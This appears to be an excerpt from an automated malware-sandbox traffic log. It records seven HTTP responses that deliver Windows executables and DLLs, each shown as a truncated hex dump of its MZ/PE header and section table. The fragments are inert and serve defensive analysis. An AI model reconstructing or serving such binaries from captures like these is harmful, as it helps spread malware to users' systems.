Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:24 GMTContent-Type: application/octet-streamContent-Length: 321536Last-Modified: Mon, 16 Sep 2024 13:46:13 GMTConnection: keep-aliveETag: "66e836a5-4e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 06 00 00 00 00 05 00 00 08 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 fa 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e9 04 00 e4 0f 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c9 11 68 37 03 ef c9 ea 63 37 33 eb 0c 77 88 e8 56 29 4a 2e 3a 18 a0 61 ed 57 27 e2 3d e6 7c a4 94 a0 51 26 fe a7 b0 05 a7 70 e5 eb e9 0e 49 49 6f 4f 9a 0c e2 67 c5 f5 c5 96 51 c2 fb 08 50 b7 7e 43 4d 16 02 1d 76 40 8e 50 2a e4 ea 53 6c 93 7f 83 1b 61 3d 08 cb 3a 75 3f 45 44 bd 22 a1 f8 4a 70 d6 d5 f1 8a 8f c5 32 a7 96 72 1c 42 c6 a3 ea 48 be cc 98 82 3f b7 76 87 a7 30 5d 32 ae c1 1f e9 8c e5 3e f4 c3 46 cc 7d c9 73 36 0b 98 4e 0e 2e cf 88 68 f7 23 19 a5 c6 02 ab 5a 93 36 97 d9 67 5e 67 75 da 61 57 26 d1 8a 32 95 6e 3f ad 76 97 d9 b0 2a e0 53 88 cb 14 7d 85 21 d4 5e 14 a1 45 cc 68 aa 64 70 c0 d3 c5 a5 14 bf 66 63 34 7b d7 b5 d3 2f 4f aa ac 49 bd f5 84 b9 76 e1 51 2c 55 d4 d4 e2 3e 78 4b b6 ac 63 f5 44 ca 85 1b e6 2f 0e d4 45 37 2e 00 ae 54 1c e3 ad a6 f4 74 84 1a b1 d1 a8 90 b8 79 c2 cc c6 b6 66 87 82 53 43 e2 d6 18 de 29 fa 46 b3 6d cc 22 32 18 c4 a7 ea 4d 73 fb 33 22 4b 4c af 65 89 8c 7a 63 db 42 62 c3 2d 05 6c c3 5c 17 9e fe 01 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:27 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Mon, 23 Sep 2024 14:42:37 GMTConnection: keep-aliveETag: "66f17e5d-58000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 04 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b1 29 00 00 00 c0 04 00 00 2a 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 f0 00 00 00 f0 04 00 00 5e 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 48 00 00 00 f0 05 00 00 4a 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
